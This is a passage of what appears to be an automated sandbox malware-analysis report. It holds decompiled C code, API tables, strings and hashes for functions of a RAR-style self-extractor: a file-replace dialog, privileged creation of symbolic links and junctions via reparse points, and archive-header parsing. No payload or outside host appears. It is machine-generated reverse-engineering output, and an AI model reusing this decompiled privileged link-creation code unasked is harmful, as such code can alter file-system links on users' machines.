				signed short _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				struct HWND__* _t160;
				intOrPtr _t163;
				void* _t164;
				int _t167;
				int _t170;
				void* _t175;
				void* _t177;

				_t157 = __edx;
				_t152 = __ecx;
				E0007E360();
				_t148 = _a6748;
				_t163 = _a6744;
				_t160 = _a6740;
				if(E0006130B(__edx, _t160, _t163, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
					_t164 = _t163 - 0x110;
					if(_t164 == 0) {
						SetFocus(GetDlgItem(_t160, 0x6c));
						E0006FE56( &_a2640, _a6752, 0x800);
						E0006BD5B( &_a2628,  &_a2628, 0x800);
						SetDlgItemTextW(_t160, 0x65,  &_a2616);
						 *0xc2080( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
						SendDlgItemMessageW(_t160, 0x66, 0x170, _a1904, 0);
						_t149 = FindFirstFileW( &_a2596,  &_a288);
						if(_t149 != 0xffffffff) {
							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
							_push(0x32);
							_push( &_a12);
							_push(0);
							_push( &_v12);
							_t167 = 2;
							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
							_push( &_a12);
							_push( &_a112);
							E0006400A( &_a900, 0x200, L"%s %s %s", E0006DDD1(_t152, 0x99));
							_t177 = _t175 + 0x18;
							SetDlgItemTextW(_t160, 0x6a,  &_a900);
							FindClose(_t149);
							if((_a308 & 0x00000010) != 0) {
								_t151 = 0x200;
							} else {
								asm("adc eax, ebp");
								E0007A63C(0 + _a344, _a340,  &_a212, 0x32);
								_push(E0006DDD1(0 + _a344, 0x98));
								_t151 = 0x200;
								E0006400A( &_a884, 0x200, L"%s %s",  &_a192);
								_t177 = _t177 + 0x14;
								SetDlgItemTextW(_t160, 0x68,  &_a884);
							}
							SendDlgItemMessageW(_t160, 0x67, 0x170, _a1928, 0);
							_t153 =  *0xa8464; // 0x0
							E00070BDD(_t153, _t157,  &_a4);
							FileTimeToLocalFileTime( &_v0,  &_v24);
							FileTimeToSystemTime( &_v24,  &_v16);
							GetTimeFormatW(0x400, _t167,  &_v16, 0,  &_a8, 0x32);
							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
							_push( &_a8);
							_push( &_a108);
							E0006400A( &_a896, _t151, L"%s %s %s", E0006DDD1(_t153, 0x99));
							_t175 = _t177 + 0x18;
							SetDlgItemTextW(_t160, 0x6b,  &_a896);
							_t154 =  *0xbdc8c;
							_t158 =  *0xbdc88;
							if((_a304 & 0x00000010) == 0 || (_t158 | _t154) != 0) {
								E0007A63C(_t158, _t154,  &_a212, 0x32);
								_push(E0006DDD1(_t154, 0x98));
								E0006400A( &_a884, _t151, L"%s %s",  &_a192);
								_t175 = _t175 + 0x14;
								SetDlgItemTextW(_t160, 0x69,  &_a884);
							}
						}
						L27:
						_t73 = 0;
						L28:
						return _t73;
					}
					if(_t164 != 1) {
						goto L27;
					}
					_t170 = 2;
					_t136 = (_t148 & 0x0000ffff) - _t170;
					if(_t136 == 0) {
						L11:
						_push(6);
						L12:
						_pop(_t170);
						L13:
						_t137 = SendDlgItemMessageW(_t160, 0x66, 0x171, 0, 0);
						if(_t137 != 0) {
							 *0xc20d4(_t137);
						}
						EndDialog(_t160, _t170);
						goto L1;
					}
					_t141 = _t136 - 0x6a;
					if(_t141 == 0) {
						_t170 = 0;
						goto L13;
					}
					_t142 = _t141 - 1;
					if(_t142 == 0) {
						_t170 = 1;
						goto L13;
					}
					_t143 = _t142 - 1;
					if(_t143 == 0) {
						_push(4);
						goto L12;
					}
					_t144 = _t143 - 1;
					if(_t144 == 0) {
						goto L13;
					}
					_t145 = _t144 - 1;
					if(_t145 == 0) {
						_push(3);
						goto L12;
					}
					if(_t145 != 1) {
						goto L27;
					}
					goto L11;
				}
				L1:
				_t73 = 1;
				goto L28;
			}

0x0007b8e0
0x0007b8e0
0x0007b8e5
0x0007b8eb
0x0007b8f4
0x0007b8fe
0x0007b91d
0x0007b927
0x0007b92d
0x0007b9a7
0x0007b9c2
0x0007b9d1
0x0007b9e1
0x0007ba02
0x0007ba18
0x0007ba34
0x0007ba39
0x0007ba4c
0x0007ba5c
0x0007ba62
0x0007ba68
0x0007ba69
0x0007ba6e
0x0007ba71
0x0007ba78
0x0007ba94
0x0007ba9e
0x0007baa6
0x0007bac4
0x0007bac9
0x0007bad7
0x0007bade
0x0007baec
0x0007bb52
0x0007baee
0x0007bb08
0x0007bb0c
0x0007bb1b
0x0007bb23
0x0007bb37
0x0007bb3c
0x0007bb4a
0x0007bb4a
0x0007bb67
0x0007bb6d
0x0007bb78
0x0007bb87
0x0007bb97
0x0007bbb1
0x0007bbc9
0x0007bbd3
0x0007bbdb
0x0007bbf5
0x0007bbfa
0x0007bc08
0x0007bc16
0x0007bc1c
0x0007bc22
0x0007bc36
0x0007bc45
0x0007bc5c
0x0007bc61
0x0007bc6f
0x0007bc6f
0x0007bc22
0x0007bc75
0x0007bc75
0x0007bc77
0x0007bc81
0x0007bc81
0x0007b932
0x00000000
0x00000000
0x0007b93d
0x0007b93e
0x0007b940
0x0007b964
0x0007b964
0x0007b966
0x0007b966
0x0007b967
0x0007b971
0x0007b979
0x0007b97c
0x0007b97c
0x0007b984
0x00000000
0x0007b984
0x0007b942
0x0007b945
0x0007b999
0x00000000
0x0007b999
0x0007b947
0x0007b94a
0x0007b996
0x00000000
0x0007b996
0x0007b94c
0x0007b94f
0x0007b990
0x00000000
0x0007b990
0x0007b951
0x0007b954
0x00000000
0x00000000
0x0007b956
0x0007b959
0x0007b98c
0x00000000
0x0007b98c
0x0007b95e
0x00000000
0x00000000
0x00000000
0x0007b95e
0x0007b91f
0x0007b921
0x00000000

APIs

Part of subcall function 0006130B: GetDlgItem.USER32(00000000,00003021), ref: 0006134F
Part of subcall function 0006130B: SetWindowTextW.USER32(00000000,000935B4), ref: 00061365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0007B971
EndDialog.USER32(?,00000006), ref: 0007B984
GetDlgItem.USER32(?,0000006C), ref: 0007B9A0
SetFocus.USER32(00000000), ref: 0007B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0007B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0007BA18
FindFirstFileW.KERNEL32(?,?), ref: 0007BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0007BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0007BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0007BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0007BA94
_swprintf.LIBCMT ref: 0007BAC4

Part of subcall function 0006400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0006401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0007BAD7
FindClose.KERNEL32(00000000), ref: 0007BADE
_swprintf.LIBCMT ref: 0007BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 0007BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0007BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0007BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 0007BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0007BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0007BBC9
_swprintf.LIBCMT ref: 0007BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0007BC08
_swprintf.LIBCMT ref: 0007BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0007BC6F

Part of subcall function 0007A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0007A662
Part of subcall function 0007A63C: GetNumberFormatW.KERNEL32 ref: 0007A6B1

Strings

%s %s, xrefs: 0007BB29, 0007BC4E
%s %s %s, xrefs: 0007BAB2, 0007BBE7
REPLACEFILEDLG, xrefs: 0007B907

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 226663492a0563d2f3e9dbce83fa609776ca65767ed330c9ed8e77594e6105df
Instruction ID: 2173b905d1b952a7ab9c948abc41f2e82d650071df352763e8db5820dd022e15
Opcode Fuzzy Hash: 226663492a0563d2f3e9dbce83fa609776ca65767ed330c9ed8e77594e6105df
Instruction Fuzzy Hash: EF919572648348BBE7319BA0DC49FFB77ECEB49704F044819F749D6091DB79A6048B62

Uniqueness

Uniqueness Score: -1.00%

Function 0006718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0006718C(void* __edx) {
				void* __esi;
				signed int _t108;
				void* _t110;
				intOrPtr _t113;
				int _t115;
				intOrPtr _t118;
				signed int _t136;
				int _t142;
				void* _t176;
				void* _t179;
				void* _t184;
				short _t185;
				intOrPtr _t191;
				void* _t196;
				void* _t197;
				void* _t216;
				void* _t217;
				intOrPtr _t218;
				intOrPtr _t220;
				void* _t222;
				WCHAR* _t223;
				intOrPtr _t227;
				short _t231;
				void* _t232;
				intOrPtr _t233;
				short _t235;
				void* _t236;
				void* _t238;
				void* _t239;

				_t217 = __edx;
				E0007E28C(E00091DC5, _t236);
				E0007E360();
				 *((intOrPtr*)(_t236 - 0x1c)) = 1;
				if( *0xa0eb3 == 0) {
					E00067BF5(L"SeRestorePrivilege");
					E00067BF5(L"SeCreateSymbolicLinkPrivilege");
					 *0xa0eb3 = 1;
				}
				_t193 = _t236 - 0x30;
				E0006709D(_t236 - 0x30, 0x1418);
				_t191 =  *((intOrPtr*)(_t236 + 0x10));
				 *(_t236 - 4) =  *(_t236 - 4) & 0x00000000;
				E0006FE56(_t236 - 0x1080, _t191 + 0x1104, 0x800);
				 *((intOrPtr*)(_t236 - 0x18)) = E000835B3(_t236 - 0x1080);
				_t226 = _t236 - 0x1080;
				_t222 = _t236 - 0x2080;
				_t108 = E00085808(_t236 - 0x1080, L"\\??\\", 4);
				_t239 = _t238 + 0x10;
				asm("sbb al, al");
				_t110 =  ~_t108 + 1;
				 *(_t236 - 0x10) = _t110;
				if(_t110 != 0) {
					_t226 = _t236 - 0x1078;
					_t184 = E00085808(_t236 - 0x1078, L"UNC\\", 4);
					_t239 = _t239 + 0xc;
					if(_t184 == 0) {
						_t185 = 0x5c;
						 *((short*)(_t236 - 0x2080)) = _t185;
						_t222 = _t236 - 0x207e;
						_t226 = _t236 - 0x1072;
					}
				}
				E000857E6(_t222, _t226);
				_t113 = E000835B3(_t236 - 0x2080);
				_t227 =  *((intOrPtr*)(_t236 + 8));
				_t223 =  *(_t236 + 0xc);
				 *((intOrPtr*)(_t236 - 0x14)) = _t113;
				if( *((char*)(_t227 + 0x6197)) != 0) {
					L9:
					_push(1);
					_push(_t223);
					E0006A04F(_t193, _t236);
					if( *((char*)(_t191 + 0x10f1)) != 0 ||  *((char*)(_t191 + 0x2104)) != 0) {
						_t115 = CreateDirectoryW(_t223, 0);
						__eflags = _t115;
						if(_t115 == 0) {
							goto L27;
						}
						goto L14;
					} else {
						_t176 = CreateFileW(_t223, 0x40000000, 0, 0, 1, 0x80, 0);
						if(_t176 == 0xffffffff) {
							L27:
							 *((char*)(_t236 - 0x1c)) = 0;
							L28:
							E000615A0(_t236 - 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t236 - 0xc));
							return  *((intOrPtr*)(_t236 - 0x1c));
						}
						CloseHandle(_t176);
						L14:
						_t118 =  *((intOrPtr*)(_t191 + 0x1100));
						if(_t118 != 3) {
							__eflags = _t118 - 2;
							if(_t118 == 2) {
								L18:
								_t196 =  *(_t236 - 0x30);
								_t218 =  *((intOrPtr*)(_t236 - 0x18));
								 *_t196 = 0xa000000c;
								_t231 = _t218 + _t218;
								 *((short*)(_t196 + 0xa)) = _t231;
								 *((short*)(_t196 + 4)) = 0x10 + ( *((intOrPtr*)(_t236 - 0x14)) + _t218) * 2;
								 *((intOrPtr*)(_t196 + 6)) = 0;
								E000857E6(_t196 + 0x14, _t236 - 0x1080);
								_t60 = _t231 + 2; // 0x3
								_t232 =  *(_t236 - 0x30);
								 *((short*)(_t232 + 0xc)) = _t60;
								 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
								E000857E6(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 0xb) * 2, _t236 - 0x2080);
								_t136 =  *(_t236 - 0x10) & 0x000000ff ^ 0x00000001;
								__eflags = _t136;
								 *(_t232 + 0x10) = _t136;
								L19:
								_t197 = CreateFileW(_t223, 0xc0000000, 0, 0, 3, 0x2200000, 0);
								 *(_t236 - 0x10) = _t197;
								if(_t197 == 0xffffffff) {
									goto L27;
								}
								_t142 = DeviceIoControl(_t197, 0x900a4, _t232, ( *(_t232 + 4) & 0x0000ffff) + 8, 0, 0, _t236 - 0x34, 0);
								_t256 = _t142;
								if(_t142 != 0) {
									E00069619(_t236 - 0x30a8);
									 *(_t236 - 4) = 1;
									E00067BD4(_t236 - 0x30a8,  *(_t236 - 0x10));
									_t233 =  *((intOrPtr*)(_t236 + 8));
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									asm("sbb ecx, ecx");
									E00069D62(_t236 - 0x30a8, _t233,  ~( *(_t233 + 0x72d0)) & _t191 + 0x00001040,  ~( *(_t233 + 0x72d4)) & _t191 + 0x00001048,  ~( *(_t233 + 0x72d8)) & _t191 + 0x00001050);
									E000696D0(_t236 - 0x30a8);
									__eflags =  *((char*)(_t233 + 0x61a8));
									if( *((char*)(_t233 + 0x61a8)) == 0) {
										E0006A444(_t223,  *((intOrPtr*)(_t191 + 0x24)));
									}
									E00069653(_t236 - 0x30a8, _t233);
									goto L28;
								}
								CloseHandle( *(_t236 - 0x10));
								E00061F94(_t256, 0x15, 0, _t223);
								_t154 = GetLastError();
								if(_t154 == 5 || _t154 == 0x522) {
									if(E00070020() == 0) {
										E0006156B(_t236 - 0x80, 0x18);
										_t154 = E00070E37(_t236 - 0x80);
									}
								}
								E0007F190(_t154);
								E00066FC6(0xa0f50, 9);
								_push(_t223);
								if( *((char*)(_t191 + 0x10f1)) == 0) {
									DeleteFileW();
								} else {
									RemoveDirectoryW();
								}
								goto L27;
							}
							__eflags = _t118 - 1;
							if(_t118 != 1) {
								goto L27;
							}
							goto L18;
						}
						_t216 =  *(_t236 - 0x30);
						_t220 =  *((intOrPtr*)(_t236 - 0x18));
						 *_t216 = 0xa0000003;
						_t235 = _t220 + _t220;
						 *((short*)(_t216 + 0xa)) = _t235;
						 *((short*)(_t216 + 4)) = 0xc + ( *((intOrPtr*)(_t236 - 0x14)) + _t220) * 2;
						 *((intOrPtr*)(_t216 + 6)) = 0;
						E000857E6(_t216 + 0x10, _t236 - 0x1080);
						_t40 = _t235 + 2; // 0x3
						_t232 =  *(_t236 - 0x30);
						 *((short*)(_t232 + 0xc)) = _t40;
						 *((short*)(_t232 + 0xe)) =  *((intOrPtr*)(_t236 - 0x14)) +  *((intOrPtr*)(_t236 - 0x14));
						E000857E6(_t232 + ( *((intOrPtr*)(_t236 - 0x18)) + 9) * 2, _t236 - 0x2080);
						goto L19;
					}
				}
				if( *(_t236 - 0x10) != 0) {
					goto L27;
				}
				_t179 = E0006B832(_t191 + 0x1104);
				_t249 = _t179;
				if(_t179 != 0) {
					goto L27;
				}
				_push(_t191 + 0x1104);
				_push(_t223);
				_push(_t191 + 0x28);
				_push(_t227);
				if(E000679B2(_t217, _t249) == 0) {
					goto L27;
				}
				goto L9;
			}

0x0006718c
0x00067191
0x0006719b
0x000671ad
0x000671b0
0x000671b7
0x000671c1
0x000671c6
0x000671c6
0x000671d1
0x000671d4
0x000671d9
0x000671dc
0x000671f3
0x00067206
0x00067209
0x00067211
0x0006721d
0x00067222
0x00067227
0x00067229
0x0006722b
0x00067230
0x00067234
0x00067242
0x00067247
0x0006724c
0x00067250
0x00067251
0x00067258
0x0006725e
0x0006725e
0x0006724c
0x00067266
0x00067272
0x00067277
0x0006727d
0x00067280
0x0006728a
0x000672c4
0x000672c7
0x000672c8
0x000672c9
0x000672d5
0x0006730c
0x00067312
0x00067314
0x00000000
0x00000000
0x00000000
0x000672e0
0x000672f1
0x000672fa
0x000674b9
0x000674b9
0x000674bd
0x000674c0
0x000674ce
0x000674d8
0x000674d8
0x00067301
0x0006731a
0x0006731a
0x00067323
0x0006738b
0x0006738e
0x00067398
0x00067398
0x0006739b
0x000673a3
0x000673a9
0x000673ac
0x000673b7
0x000673bd
0x000673cb
0x000673d0
0x000673d3
0x000673d6
0x000673df
0x000673f4
0x00067402
0x00067402
0x00067405
0x00067408
0x00067420
0x00067422
0x00067428
0x00000000
0x00000000
0x00067446
0x0006744c
0x0006744e
0x000674e9
0x000674f7
0x000674fb
0x00067500
0x00067511
0x00067524
0x00067537
0x00067542
0x0006754d
0x00067552
0x00067559
0x0006755f
0x0006755f
0x0006756a
0x00000000
0x0006756a
0x00067457
0x00067462
0x00067467
0x00067470
0x00067480
0x00067487
0x0006748f
0x0006748f
0x00067480
0x0006749b
0x000674a4
0x000674b0
0x000674b1
0x000674db
0x000674b3
0x000674b3
0x000674b3
0x00000000
0x000674b1
0x00067390
0x00067392
0x00000000
0x00000000
0x00000000
0x00067392
0x00067325
0x00067328
0x00067330
0x00067336
0x00067339
0x00067344
0x0006734a
0x00067358
0x0006735d
0x00067360
0x00067363
0x0006736c
0x00067381
0x00000000
0x00067386
0x000672d5
0x00067290
0x00000000
0x00000000
0x0006729d
0x000672a2
0x000672a4
0x00000000
0x00000000
0x000672b0
0x000672b1
0x000672b5
0x000672b6
0x000672be
0x00000000
0x00000000
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00067191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 000672F1
CloseHandle.KERNEL32(00000000), ref: 00067301

Part of subcall function 00067BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00067C04
Part of subcall function 00067BF5: GetLastError.KERNEL32 ref: 00067C4A
Part of subcall function 00067BF5: CloseHandle.KERNEL32(?), ref: 00067C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0006730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0006741A
DeviceIoControl.KERNEL32 ref: 00067446
CloseHandle.KERNEL32(?), ref: 00067457
GetLastError.KERNEL32 ref: 00067467
RemoveDirectoryW.KERNEL32(?), ref: 000674B3
DeleteFileW.KERNEL32(?), ref: 000674DB

Strings

UNC\, xrefs: 0006723C
SeRestorePrivilege, xrefs: 000671B2
SeCreateSymbolicLinkPrivilege, xrefs: 000671BC
\??\, xrefs: 00067217

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: 3f8a7d8840fb212700f3efc8b13813219d2af8d94359825c1691b5e40b0fbdca
Instruction ID: 2857f677a6ae13d47ab49e105a4c857d66394169bd2d321ce43172f6c95699f0
Opcode Fuzzy Hash: 3f8a7d8840fb212700f3efc8b13813219d2af8d94359825c1691b5e40b0fbdca
Instruction Fuzzy Hash: 1DB1E071904215ABDF20DFA4DC45BEEB7B9FF04704F0445A9F949E7242DB38AA49CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00063281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00063281(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				signed int _t242;
				void* _t248;
				unsigned int _t250;
				signed int _t254;
				signed int _t255;
				unsigned int _t256;
				void* _t257;
				char _t270;
				signed int _t289;
				unsigned int _t290;
				intOrPtr _t291;
				signed int _t292;
				signed int _t295;
				char _t302;
				signed char _t304;
				signed int _t320;
				signed int _t331;
				signed int _t335;
				signed int _t350;
				signed char _t352;
				unsigned int _t362;
				void* _t379;
				void* _t381;
				void* _t382;
				void* _t393;
				intOrPtr* _t395;
				intOrPtr* _t397;
				signed int _t410;
				signed int _t420;
				char _t432;
				signed int _t433;
				signed int _t438;
				signed int _t442;
				intOrPtr _t450;
				unsigned int _t456;
				unsigned int _t459;
				signed int _t463;
				signed int _t471;
				signed int _t480;
				signed int _t485;
				signed int _t500;
				intOrPtr _t501;
				signed int _t502;
				signed char _t503;
				unsigned int _t504;
				void* _t511;
				void* _t519;
				signed int _t522;
				void* _t523;
				signed int _t533;
				unsigned int _t536;
				void* _t541;
				intOrPtr _t546;
				void* _t547;
				void* _t548;
				void* _t549;
				intOrPtr _t559;

				_t397 = __ecx;
				_t549 = _t548 - 0x68;
				E0007E28C(E00091D01, _t547);
				E0007E360();
				_t395 = _t397;
				E0006C565(_t547 + 0x30, _t395);
				 *(_t547 + 0x60) = 0;
				 *((intOrPtr*)(_t547 - 4)) = 0;
				if( *((intOrPtr*)(_t395 + 0x6cbc)) == 0) {
					L15:
					 *((char*)(_t547 + 0x6a)) = 0;
					L16:
					_push(7);
					if(E0006C770() >= 7) {
						 *(_t395 + 0x21f4) = 0;
						_t511 = _t395 + 0x21e4;
						 *_t511 = E0006C5E0(_t547 + 0x30);
						_t533 = E0006C74C(_t547 + 0x30, 4);
						_t242 = E0006C6E0(_t500);
						__eflags = _t242 | _t500;
						if((_t242 | _t500) == 0) {
							L85:
							E0006204E(_t395);
							L86:
							E000615A0(_t547 + 0x30);
							 *[fs:0x0] =  *((intOrPtr*)(_t547 - 0xc));
							return  *(_t547 + 0x60);
						}
						__eflags = _t533;
						if(_t533 == 0) {
							goto L85;
						}
						_t42 = _t533 - 3; // -3
						_t536 = _t533 + 4 + _t242;
						_t410 = _t42 + _t242;
						__eflags = _t410;
						 *(_t547 + 0x64) = _t536;
						if(_t410 < 0) {
							goto L85;
						}
						__eflags = _t536 - 7;
						if(_t536 < 7) {
							goto L85;
						}
						_push(_t410);
						E0006C770();
						__eflags =  *(_t547 + 0x48) - _t536;
						if( *(_t547 + 0x48) < _t536) {
							goto L17;
						}
						_t248 = E0006C6C0(_t547 + 0x30);
						 *(_t395 + 0x21e8) = E0006C6E0(_t500);
						_t250 = E0006C6E0(_t500);
						 *(_t395 + 0x21ec) = _t250;
						__eflags =  *_t511 - _t248;
						 *(_t395 + 0x21f4) = _t250 >> 0x00000002 & 0x00000001;
						 *(_t395 + 0x21f0) =  *(_t547 + 0x64);
						_t254 =  *(_t395 + 0x21e8);
						 *(_t395 + 0x21dc) = _t254;
						_t255 = _t254 & 0xffffff00 |  *_t511 != _t248;
						 *(_t547 + 0x6b) = _t255;
						__eflags = _t255;
						if(_t255 == 0) {
							L26:
							_t256 = 0;
							__eflags =  *(_t395 + 0x21ec) & 0x00000001;
							 *(_t547 + 0x58) = 0;
							 *(_t547 + 0x54) = 0;
							if(( *(_t395 + 0x21ec) & 0x00000001) == 0) {
								L30:
								__eflags =  *(_t395 + 0x21ec) & 0x00000002;
								_t538 = _t256;
								 *(_t547 + 0x64) = _t256;
								 *(_t547 + 0x5c) = _t256;
								if(( *(_t395 + 0x21ec) & 0x00000002) != 0) {
									_t362 = E0006C6E0(_t500);
									_t538 = _t362;
									 *(_t547 + 0x64) = _t362;
									 *(_t547 + 0x5c) = _t500;
								}
								_t257 = E00061924(_t395,  *(_t395 + 0x21f0));
								_t501 = 0;
								asm("adc eax, edx");
								 *((intOrPtr*)(_t395 + 0x6ca8)) = E00063E70( *((intOrPtr*)(_t395 + 0x6ca0)) + _t257,  *((intOrPtr*)(_t395 + 0x6ca4)), _t538,  *(_t547 + 0x5c), _t501, _t501);
								 *((intOrPtr*)(_t395 + 0x6cac)) = _t501;
								_t502 =  *(_t395 + 0x21e8);
								__eflags = _t502 - 1;
								if(__eflags == 0) {
									E0006ACCC(_t395 + 0x2208);
									_t420 = 5;
									memcpy(_t395 + 0x2208, _t511, _t420 << 2);
									_t503 = E0006C6E0(_t502);
									 *(_t395 + 0x6cb5) = _t503 & 1;
									 *(_t395 + 0x6cb4) = _t503 >> 0x00000002 & 1;
									 *(_t395 + 0x6cb7) = _t503 >> 0x00000004 & 1;
									_t432 = 1;
									 *((char*)(_t395 + 0x6cba)) = 1;
									 *(_t395 + 0x6cbb) = _t503 >> 0x00000003 & 1;
									_t270 = 0;
									 *((char*)(_t395 + 0x6cb8)) = 0;
									__eflags = _t503 & 0x00000002;
									if((_t503 & 0x00000002) == 0) {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = 0;
									} else {
										 *((intOrPtr*)(_t395 + 0x6cd8)) = E0006C6E0(_t503);
										_t270 = 0;
										_t432 = 1;
									}
									__eflags =  *(_t395 + 0x6cb5);
									if( *(_t395 + 0x6cb5) == 0) {
										L81:
										_t432 = _t270;
										goto L82;
									} else {
										__eflags =  *((intOrPtr*)(_t395 + 0x6cd8)) - _t270;
										if( *((intOrPtr*)(_t395 + 0x6cd8)) == _t270) {
											L82:
											 *((char*)(_t395 + 0x6cb9)) = _t432;
											_t433 =  *(_t547 + 0x58);
											__eflags = _t433 |  *(_t547 + 0x54);
											if((_t433 |  *(_t547 + 0x54)) != 0) {
												E00062162(_t395, _t547 + 0x30, _t433, _t395 + 0x2208);
											}
											L84:
											 *(_t547 + 0x60) =  *(_t547 + 0x48);
											goto L86;
										}
										goto L81;
									}
								}
								if(__eflags <= 0) {
									goto L84;
								}
								__eflags = _t502 - 3;
								if(_t502 <= 3) {
									__eflags = _t502 - 2;
									_t120 = (0 | _t502 != 0x00000002) - 1; // -1
									_t519 = (_t120 & 0xffffdcb0) + 0x45d0 + _t395;
									 *(_t547 + 0x2c) = _t519;
									E0006AC32(_t519, 0);
									_t438 = 5;
									memcpy(_t519, _t395 + 0x21e4, _t438 << 2);
									_t541 =  *(_t547 + 0x2c);
									 *(_t547 + 0x60) =  *(_t395 + 0x21e8);
									 *(_t541 + 0x1058) =  *(_t547 + 0x64);
									 *((char*)(_t541 + 0x10f9)) = 1;
									 *(_t541 + 0x105c) =  *(_t547 + 0x5c);
									 *(_t541 + 0x1094) = E0006C6E0(_t502);
									 *(_t541 + 0x1060) = E0006C6E0(_t502);
									_t289 =  *(_t541 + 0x1094) >> 0x00000003 & 0x00000001;
									__eflags = _t289;
									 *(_t541 + 0x1064) = _t502;
									 *(_t541 + 0x109a) = _t289;
									if(_t289 != 0) {
										 *(_t541 + 0x1060) = 0x7fffffff;
										 *(_t541 + 0x1064) = 0x7fffffff;
									}
									_t442 =  *(_t541 + 0x105c);
									_t522 =  *(_t541 + 0x1064);
									_t290 =  *(_t541 + 0x1058);
									_t504 =  *(_t541 + 0x1060);
									__eflags = _t442 - _t522;
									if(__eflags < 0) {
										L51:
										_t290 = _t504;
										_t442 = _t522;
										goto L52;
									} else {
										if(__eflags > 0) {
											L52:
											 *(_t541 + 0x106c) = _t442;
											 *(_t541 + 0x1068) = _t290;
											_t291 = E0006C6E0(_t504);
											__eflags =  *(_t541 + 0x1094) & 0x00000002;
											 *((intOrPtr*)(_t541 + 0x24)) = _t291;
											if(( *(_t541 + 0x1094) & 0x00000002) != 0) {
												E00070DBD(_t541 + 0x1040, _t504, E0006C5E0(_t547 + 0x30), 0);
											}
											 *(_t541 + 0x1070) =  *(_t541 + 0x1070) & 0x00000000;
											__eflags =  *(_t541 + 0x1094) & 0x00000004;
											if(( *(_t541 + 0x1094) & 0x00000004) != 0) {
												 *(_t541 + 0x1070) = 2;
												 *((intOrPtr*)(_t541 + 0x1074)) = E0006C5E0(_t547 + 0x30);
											}
